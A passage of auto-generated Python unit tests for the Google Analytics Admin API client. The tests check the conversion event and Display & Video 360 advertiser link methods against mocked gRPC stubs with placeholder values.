AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: client.create_conversion_event() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateConversionEventRequest() @pytest.mark.asyncio async def test_create_conversion_event_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateConversionEventRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) ) response = await client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateConversionEventRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.ConversionEvent) assert response.name == "name_value" assert response.event_name == "event_name_value" assert response.deletable is True assert response.custom is True @pytest.mark.asyncio async def test_create_conversion_event_async_from_dict(): await test_create_conversion_event_async(request_type=dict) def test_create_conversion_event_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateConversionEventRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: call.return_value = resources.ConversionEvent() client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_conversion_event_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateConversionEventRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) await client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_conversion_event_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_conversion_event( parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].conversion_event == resources.ConversionEvent(name="name_value") def test_create_conversion_event_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_conversion_event( analytics_admin.CreateConversionEventRequest(), parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) @pytest.mark.asyncio async def test_create_conversion_event_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_conversion_event( parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].conversion_event == resources.ConversionEvent(name="name_value") @pytest.mark.asyncio async def test_create_conversion_event_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_conversion_event( analytics_admin.CreateConversionEventRequest(), parent="parent_value", conversion_event=resources.ConversionEvent(name="name_value"), ) def test_get_conversion_event( transport: str = "grpc", request_type=analytics_admin.GetConversionEventRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) response = client.get_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetConversionEventRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.ConversionEvent) assert response.name == "name_value" assert response.event_name == "event_name_value" assert response.deletable is True assert response.custom is True def test_get_conversion_event_from_dict(): test_get_conversion_event(request_type=dict) def test_get_conversion_event_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: client.get_conversion_event() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetConversionEventRequest() @pytest.mark.asyncio async def test_get_conversion_event_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetConversionEventRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) ) response = await client.get_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetConversionEventRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.ConversionEvent) assert response.name == "name_value" assert response.event_name == "event_name_value" assert response.deletable is True assert response.custom is True @pytest.mark.asyncio async def test_get_conversion_event_async_from_dict(): await test_get_conversion_event_async(request_type=dict) def test_get_conversion_event_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetConversionEventRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: call.return_value = resources.ConversionEvent() client.get_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_conversion_event_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetConversionEventRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) await client.get_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_conversion_event_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_conversion_event_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_conversion_event( analytics_admin.GetConversionEventRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_conversion_event_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.ConversionEvent() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_conversion_event_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_conversion_event( analytics_admin.GetConversionEventRequest(), name="name_value", ) def test_delete_conversion_event( transport: str = "grpc", request_type=analytics_admin.DeleteConversionEventRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteConversionEventRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_conversion_event_from_dict(): test_delete_conversion_event(request_type=dict) def test_delete_conversion_event_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: client.delete_conversion_event() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteConversionEventRequest() @pytest.mark.asyncio async def test_delete_conversion_event_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteConversionEventRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteConversionEventRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_conversion_event_async_from_dict(): await test_delete_conversion_event_async(request_type=dict) def test_delete_conversion_event_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteConversionEventRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: call.return_value = None client.delete_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_conversion_event_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteConversionEventRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_conversion_event_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_conversion_event_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_conversion_event( analytics_admin.DeleteConversionEventRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_conversion_event_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_conversion_event(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_conversion_event_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_conversion_event( analytics_admin.DeleteConversionEventRequest(), name="name_value", ) def test_list_conversion_events( transport: str = "grpc", request_type=analytics_admin.ListConversionEventsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListConversionEventsResponse( next_page_token="next_page_token_value", ) response = client.list_conversion_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListConversionEventsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListConversionEventsPager) assert response.next_page_token == "next_page_token_value" def test_list_conversion_events_from_dict(): test_list_conversion_events(request_type=dict) def test_list_conversion_events_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: client.list_conversion_events() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListConversionEventsRequest() @pytest.mark.asyncio async def test_list_conversion_events_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListConversionEventsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListConversionEventsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_conversion_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListConversionEventsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListConversionEventsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_conversion_events_async_from_dict(): await test_list_conversion_events_async(request_type=dict) def test_list_conversion_events_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListConversionEventsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: call.return_value = analytics_admin.ListConversionEventsResponse() client.list_conversion_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_conversion_events_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListConversionEventsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListConversionEventsResponse() ) await client.list_conversion_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_conversion_events_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListConversionEventsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_conversion_events(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_conversion_events_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_conversion_events( analytics_admin.ListConversionEventsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_conversion_events_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListConversionEventsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListConversionEventsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_conversion_events(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_conversion_events_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_conversion_events( analytics_admin.ListConversionEventsRequest(), parent="parent_value", ) def test_list_conversion_events_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_conversion_events(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.ConversionEvent) for i in results) def test_list_conversion_events_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) pages = list(client.list_conversion_events(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_conversion_events_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) async_pager = await client.list_conversion_events(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.ConversionEvent) for i in responses) @pytest.mark.asyncio async def test_list_conversion_events_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_conversion_events), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), resources.ConversionEvent(), ], next_page_token="abc", ), analytics_admin.ListConversionEventsResponse( conversion_events=[], next_page_token="def", ), analytics_admin.ListConversionEventsResponse( conversion_events=[resources.ConversionEvent(),], next_page_token="ghi", ), analytics_admin.ListConversionEventsResponse( conversion_events=[ resources.ConversionEvent(), resources.ConversionEvent(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_conversion_events(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) response = client.get_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" def test_get_display_video360_advertiser_link_from_dict(): test_get_display_video360_advertiser_link(request_type=dict) def test_get_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: client.get_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) ) response = await client.get_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_async_from_dict(): await test_get_display_video360_advertiser_link_async(request_type=dict) def test_get_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDisplayVideo360AdvertiserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLink() client.get_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDisplayVideo360AdvertiserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) await client.get_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 